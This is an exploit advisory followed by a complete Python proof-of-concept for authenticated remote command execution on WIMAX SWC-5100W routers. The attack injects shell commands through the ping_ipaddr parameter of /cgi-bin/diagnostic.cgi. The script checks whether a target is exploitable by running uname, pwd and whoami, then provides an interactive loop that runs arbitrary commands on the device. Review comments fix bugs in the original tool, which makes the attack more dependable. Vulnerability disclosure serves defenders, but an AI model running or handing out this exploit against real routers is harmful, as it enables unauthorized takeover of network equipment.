WIMAX SWC-5100W Remote Command Execution
WIMAX SWC-5100W (firmware 1.11.0.1 : 1.9.9.4) suffers from an authenticated remote command execution vulnerability: the `ping_ipaddr` parameter of `/cgi-bin/diagnostic.cgi` (the web UI's ping diagnostic) reaches a shell unescaped, so a value beginning with `;` runs arbitrary commands as the CGI's user. Note that the proof-of-concept script below sends no credentials or session cookie, so it only works against a session the device already accepts.
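# Exploit Title: WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE
# Vulnerability Name: Ballin' Mada
# Date: 4/3/2023
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: http://www.seowonintech.co.kr/eng/main
# Version: Bootloader(1.18.19.0) , HW (0.0.7.0), FW(1.11.0.1 : 1.9.9.4)
# Tested on: Unix
# CVE : Under registration
#
# Injection point: the `ping_ipaddr` query parameter of /cgi-bin/diagnostic.cgi
# is handed to a shell; a leading ';' ends the ping command and runs ours.
#
# NOTE(review): the advisory calls this *authenticated* RCE, but this script
# sends no credentials and no session cookie. Against a device that enforces
# login the CGI answers with the login page and the checks below report
# "not vulnerable" -- run it from a host whose session the router accepts,
# or add the cookie/basic-auth the target expects to run_cmd().
from __future__ import annotations

import argparse
import random
import sys

import requests
from bs4 import BeautifulSoup
from colorama import Fore

red = Fore.RED
green = Fore.GREEN
cyan = Fore.CYAN
yellow = Fore.YELLOW
reset = Fore.RESET

# The original script issued requests with no timeout, so a silent host hung
# the tool forever. Seconds.
TIMEOUT = 15

CGI_PATH = "/cgi-bin/diagnostic.cgi"

# Set by main() from --target; checkEXP()/revShell() fall back to it when
# called without an explicit host (keeps the original no-argument call style).
target = None

# Raw string: the art contains "\|", which a normal string literal treats as an
# invalid escape (SyntaxWarning on Python 3.12+).
banner = r"""
 ____ ____ ____ ____ ____ ____ ____ _________ ____ ____ ____ ____
||B |||a |||l |||l |||i |||n |||' ||| |||M |||a |||d |||a ||
||__|||__|||__|||__|||__|||__|||__|||_______|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/_______\|/__\|/__\|/__\|/__\|

            RCE 0day in WIMAX SWC-5100W
         [ Spell the CGI as in Cyber Guy ]
"""


def inject_params(shell_cmd: str) -> dict[str, str]:
    """Return the diagnostic.cgi query parameters that run *shell_cmd*.

    The payload is ``;<cmd>;`` in ``ping_ipaddr``. Passing it as ``params``
    lets requests URL-encode it; the original concatenated the command into
    the URL, so a command containing ``&`` or ``#`` was truncated.
    """
    return {
        "action": "Apply",
        "html_view": "ping",
        "ping_count": "10",
        "ping_ipaddr": f";{shell_cmd};",
    }


def run_cmd(host: str, shell_cmd: str) -> requests.Response:
    """Send *shell_cmd* through the injection on *host*; return the response.

    Raises ``requests.RequestException`` on connection/timeout errors.
    """
    return requests.get(
        f"http://{host}{CGI_PATH}",
        params=inject_params(shell_cmd),
        timeout=TIMEOUT,
    )


def tagged_output(response: requests.Response, tag_id: str) -> str | None:
    """Return the text of the ``<a id=tag_id>`` element in *response*.

    Returns None when the element is absent (login page, error page, or the
    command did not execute) instead of letting ``.text`` raise on None.
    """
    node = BeautifulSoup(response.text, "html.parser").find(id=tag_id)
    return None if node is None else node.text


def checkEXP(host: str | None = None) -> bool:
    """Probe *host* (default: module ``target``) and print a verdict.

    Step 1 echoes a random marker and looks for it in the page text. Step 2
    wraps the output of ``uname -a``/``pwd``/``whoami`` in an ``<a id=pwned>``
    tag and prints it. Returns True only when step 2 shows executed output.

    Fixes: the original test was ``find(m1) < 0 or find(m2)``, which is true
    whenever m2 is *absent* (find() returns -1, which is truthy), so every
    200 response was declared vulnerable and the follow-up ``.text`` crashed
    on a missing tag.
    """
    host = target if host is None else host
    print(cyan + "[+] Checking if target is vulnerable" + reset)
    art = ['PWNED_1EE7', 'CGI AS IN CYBER GUY']
    marker = random.choice(art)
    try:
        request = run_cmd(host, f"echo 'PUTS({marker})'")
    except requests.RequestException as exc:
        print(red + f"[-] Request failed: {exc}" + reset)
        return False
    if request.status_code != 200:
        print(red + "[+] Status code: " + str(request.status_code) + reset)
        return False
    print(green + "[+] Status code: 200 success" + reset)

    # Check only the marker we actually sent (the original looked for both).
    if marker not in BeautifulSoup(request.text, 'html.parser').get_text(" "):
        print(red + "[+] Seems to be not vulnerable" + reset)
        return False

    info = ("[*] Kernel: `uname -a` -=-=- [*] Current directory: `pwd` "
            "-=-=- [*] User: `whoami`")
    try:
        uname = run_cmd(host, f'echo "<a id=\'pwned\'>{info}</a>"')
    except requests.RequestException as exc:
        print(red + f"[-] Request failed: {exc}" + reset)
        return False
    output = tagged_output(uname, "pwned")
    # A page that merely reflects ping_ipaddr back into the form would also
    # contain the marker and the tag; if the backticks survived unexpanded
    # the shell never ran our command, so don't claim RCE.
    if output is None or "`uname" in output:
        print(red + "[+] Marker reflected but command not executed; "
              "seems to be not vulnerable" + reset)
        return False
    print(green + "[+] Target is vulnerable" + reset)
    print(output)
    return True


def revShell(host: str | None = None) -> None:
    """Interactive command loop on *host* (default: module ``target``).

    Despite the flag name this is not a reverse shell: every command is a
    separate HTTP request and its output is read back from the response, so
    there is no working directory or environment carried between commands.
    The command is placed inside backticks within a double-quoted echo, so a
    command containing a double quote or a backtick will break the payload.

    Fixes: the original recursed once per command (``return revShell()``) and
    hit the recursion limit after ~1000 commands, sent ``exit``/``quit`` to
    the target before checking them, and crashed with AttributeError when the
    result tag was missing.
    """
    host = target if host is None else host
    try:
        while True:
            cmd = input("CGI #:- ")
            if not cmd:          # empty line ends the loop, as before
                return
            if cmd in ("exit", "quit"):
                print(yellow + "[*] Terminating ..." + reset)
                sys.exit(0)
            try:
                resp = run_cmd(host, f'echo "<a id=\'result\'>`{cmd}`</a>"')
            except requests.RequestException as exc:
                print(red + f"[-] Request failed: {exc}" + reset)
                continue
            output = tagged_output(resp, "result")
            if output is None:
                print(red + "[-] No result in response (session gone or "
                      "command not executed)" + reset)
            else:
                print(output)
    except (KeyboardInterrupt, EOFError):
        sys.exit(0)


def main() -> None:
    """Parse arguments and dispatch.

    The original also defined an unused ``help()`` that shadowed the builtin
    and advertised a ``-fz/--fuzz`` option that does not exist; the example
    invocation now lives in the argparse epilog.
    """
    global target
    argParser = argparse.ArgumentParser(
        epilog="Example: python3 pwnMada.py -t 192.168.1.1 -rv",
    )
    argParser.add_argument("-t", "--target", help="Target router")
    argParser.add_argument("-rv", "--reverseShell",
                           help="Interactive command shell over the injection",
                           action='store_true')
    argParser.add_argument("-tx", "--testExploit", help="Test exploitability",
                           action='store_true')
    args = argParser.parse_args()
    target = args.target

    print(banner)
    if target and args.reverseShell:
        revShell(target)
    elif target and args.testExploit:
        checkEXP(target)
    else:
        argParser.print_help()


if __name__ == "__main__":
    main()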